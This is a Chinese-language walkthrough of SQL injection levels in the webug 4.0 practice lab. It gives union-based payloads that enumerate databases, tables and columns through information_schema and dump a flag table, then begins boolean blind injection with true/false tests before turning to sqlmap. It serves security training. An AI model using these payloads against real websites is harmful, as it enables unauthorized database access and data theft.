webug4.0之sql注入篇

一. 显错注入

二. 布尔盲注

三. 延时注入

四. post注入

五. 过滤注入

六. 宽字节注入

一. 显错注入

1. 页面观察

输入id=1和id=2页面，页面显示不同，所以可以判断此变化的地方与数据库有交互，如果存在sql注入我们可以使用联合（显示）注入

2. 判断是否存在注入漏洞

输入id=1'，显示错误，说我们的语法不正确。且显示出了数据库查询语句，可以知道为字符型注入，且字符为单引号。所以注入点就是加单引号就行

3. 使用联合注入

(1) 判断当前表的字段个数

id=1' orde by 2 --+

当输入order by 2 --+ 时没错，输入3时报错。说明当前表的字段个数为2

（2）判断显示位

?id=-1' union select 22,33 --+

如下，说明页面中33的这个位置与数据库有交互，数据在这里显示，所以我们可以把payload放入到这里

（3）函数查询

查询数据库版本，mysql 5.0版本之后产生了一个虚拟数据库information_schema，我们可以利用这个表进行快速查询。如下mysql版本是大于5.0的

?id=-1' union select 22,version() --+

查看所有数据库名字

?id=-1' union select 22,GROUP_CONCAT(schema_name) FROM information_schema.SCHEMATA --+

前三个都是mysql自带的数据库，因此我们只需要注意后面的webug、webug_sys、webug_width_byte数据库就行

确认当前查询的数据库名字

id=-1' union select 22,database() --+

查询当前数据库下面的表

由于不知道那个Flag在哪，但是还是首先考虑同一个数据库下的表吧

?id=-1' union select 22,GROUP_CONCAT(table_name) FROM information_schema.TABLES WHERE table_schema='webug' --+

我们看到了一个flag表，查看一下

查看表中有哪些字段

?id=-1' union select 22,GROUP_CONCAT(column_name) FROM information_schema.COLUMNS WHERE table_name='flag' AND table_schema='webug' --+

可见flag表中有连个字段分别为id，flag

查看字段中的内容

同时查询字段id和flag的值

?id=-1' union select 22,group_concat(id,'--',flag) from flag --+

提交flag

获取到flag值我们就可以进行提交了

二. 布尔盲注

1. 页面分析

当我们输入的id正确是页面显示如下

当输入的id值错误时，如id=-1或者id=1'，显示如下

即，页面只会呈现出两种状态，相当于true和false两种结果。我们输入的值影响到了数据的查询，由此可以判断程序并没有对我们输入的数据进行判断，所以这里肯定存在sql注入

2. 注入点判断

sql注入最重要的就是找到注入点，找到了剩下的绝大多部分可以交给sqlmap进行注入

当我们输入 id =1' and 1=1 --+ 时，页面正常显示

输入 id=1' and 1=2 --+ ,页面又显示不全，说明程序对我们输入的and 1=2的语句做出了正确的响应，由此可以知道注入点就是 id=1'

3. 猜解数据库名字

由于布尔盲注比较繁琐这里我就偷点懒直接使用sqlmap进行注入了~~嘿嘿